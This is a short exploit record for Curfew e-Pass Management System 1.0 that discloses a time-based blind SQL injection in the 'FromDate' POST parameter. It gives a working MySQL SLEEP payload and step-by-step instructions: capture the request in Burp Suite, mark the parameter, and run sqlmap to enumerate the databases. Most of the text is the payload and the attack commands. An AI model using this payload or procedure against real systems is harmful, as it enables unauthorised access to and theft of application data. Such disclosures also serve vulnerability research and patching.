# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
# Exploit Author: Puja Dey
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Windows 10/Wamp

1) login into the application
2) click on report on pass and capture the request in burpsuite
3) Parameter "FromDate" is vulnerable to SQL Injection
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agent